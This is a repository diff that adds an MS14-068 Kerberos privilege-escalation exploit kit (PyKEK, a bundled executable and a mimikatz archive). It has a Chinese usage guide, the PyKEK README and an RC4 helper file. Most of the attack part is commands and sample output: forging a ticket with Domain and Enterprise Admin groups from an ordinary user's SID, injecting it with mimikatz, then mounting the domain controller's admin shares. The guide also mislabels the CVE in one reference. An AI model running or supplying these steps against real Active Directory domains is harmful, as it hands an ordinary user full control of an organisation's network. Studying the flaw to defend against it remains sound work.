SecWiki
diff --git a/‎MS14-068/MS14-068.exe
3.33 MB b/‎MS14-068/MS14-068.exe
3.33 MB
diff --git a/‎MS14-068/README.md
Lines changed: 42 additions & 0 deletions b/‎MS14-068/README.md
Lines changed: 42 additions & 0 deletions
diff --git a/‎MS14-068/img/x1.png
21.2 KB b/‎MS14-068/img/x1.png
21.2 KB
diff --git a/‎MS14-068/img/x2.png
6.75 KB b/‎MS14-068/img/x2.png
6.75 KB
diff --git a/‎MS14-068/img/x3.png
21.3 KB b/‎MS14-068/img/x3.png
21.3 KB
diff --git a/‎MS14-068/img/x4.png
8.3 KB b/‎MS14-068/img/x4.png
8.3 KB
diff --git a/‎MS14-068/mimikatz_trunk.zip
708 KB b/‎MS14-068/mimikatz_trunk.zip
708 KB
diff --git a/‎MS14-068/pykek/README.md
Lines changed: 64 additions & 0 deletions b/‎MS14-068/pykek/README.md
Lines changed: 64 additions & 0 deletions
diff --git a/‎MS14-068/pykek/kek/__init__.py b/‎MS14-068/pykek/kek/__init__.py
diff --git a/‎MS14-068/pykek/kek/_crypto/ARC4.py
Lines changed: 24 additions & 0 deletions b/‎MS14-068/pykek/kek/_crypto/ARC4.py
Lines changed: 24 additions & 0 deletions
@@ -0,0 +1,42 @@
+# MS14-068
+
+```
+将普通域用户权限提升为域控权限  
+（漏洞利用后，netuse \\swg.server.com\c$可以直接访问域控的网络资源
+```
+
+Vulnerability reference:
+ * [MS14-068](https://technet.microsoft.com/library/security/ms14-068)
+ * [CVE-2008-4037](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324)
+ 
+## Usage
+```
+域管理员:DCwin03  域名:demo.com  普通域用户:hx
+
+登录普通域用户hx，cmd中输入"whoami/user"获取sid  
+demo/hx   S-1-5-21-3813283032-1038476579-1047458262-1110
+  
+![x1](img/x1.png)  
+![x2](img/x2.png)
+退出域用户hx，登录本地用户123  
+
+python ms14-068.py -u [email protected] -p pwd_of_test -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com  
+![x3](img/x4.png)
+![x4](img/x4.png)  
+c:\User\123>Mimikatz.exe "kerberos:ptc [email protected]" exit  
+  
+net use \\DCwin03\admin$  
+
+dir \\DCwin03\c$
+```
+
+
+## References
+* [Additional information about CVE-2014-6324](http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx)
+* [深入解读MS14-068漏洞](http://www.freebuf.com/vuls/56081.html)
+* [Attack Methods for Gaining Domain Admin Rights in Active Directory](https://adsecurity.org/?p=2362)
+* [MS14068域控提权漏洞及其防护](http://www.php230.com/weixin1418640395.html)
+* [MS14-068 privilege escalation PoC](http://www.secpulse.com/archives/2874.html)
+
+
+
@@ -0,0 +1,64 @@
+Python Kerberos Exploitation Kit
+===
+
+PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
+
+For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit  MS14-068 (CVE-2014-6324) .
+
+More is coming...
+
+# Author
+Sylvain Monné
+
+Contact : sylvain dot monne at solucom dot fr
+
+http://twitter.com/bidord
+
+Special thanks to: Benjamin DELPY `gentilkiwi`
+
+# Library content
+* kek.krb5: Kerberos V5 ([RFC 4120](https://tools.ietf.org/html/rfc4120)) ASN.1 structures and basic protocol functions
+* kek.ccache: Credential Cache Binary Format ([cchache](http://www.gnu.org/software/shishi/manual/html_node/The-Credential-Cache-Binary-File-Format.html))
+* kek.pac: Microsoft Privilege Attribute Certificate Data Structure ([MS-PAC](http://msdn.microsoft.com/en-us/library/cc237917.aspx))
+* kek.crypto: Kerberos and MS specific cryptographic functions
+
+# Exploits
+## ms14-068.py
+Exploits [MS14-680](https://technet.microsoft.com/en-us/library/security/ms14-068.aspx) vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
+- Domain Users (513)
+- Domain Admins (512)
+- Schema Admins (518)
+- Enterprise Admins (519)
+- Group Policy Creator Owners (520)
+
+### Usage :
+```
+USAGE:
+ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
+
+OPTIONS:
+    -p <clearPassword>
+ --rc4 <ntlmHash>
+```
+### Example usage :
+#### Linux (tested with samba and MIT Kerberos)
+```
+root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
+Password: 
+  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
+  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
+  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
+  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
+  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
+  [+] Creating ccache file '[email protected]'... Done!
+root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0 
+```
+#### On Windows
+
+```
+python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
+mimikatz.exe "kerberos::ptc [email protected]" exit`
+```
@@ -0,0 +1,24 @@
+class ARC4Cipher(object):
+     def __init__(self, key):
+         self.key = key
+         
+     def encrypt(self, data):
+         S = range(256)
+         j = 0
+         out = []
+         for i in range(256):
+             j = (j + S[i] + ord( self.key[i % len(self.key)] )) % 256
+             S[i] , S[j] = S[j] , S[i]
+         i = j = 0
+         for char in data:
+             i = ( i + 1 ) % 256
+             j = ( j + S[i] ) % 256
+             S[i] , S[j] = S[j] , S[i]
+             out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
+         return ''.join(out)
+
+     def decrypt(self, data):
+         return self.encrypt(data)
+
+def new(key):
+    return ARC4Cipher(key)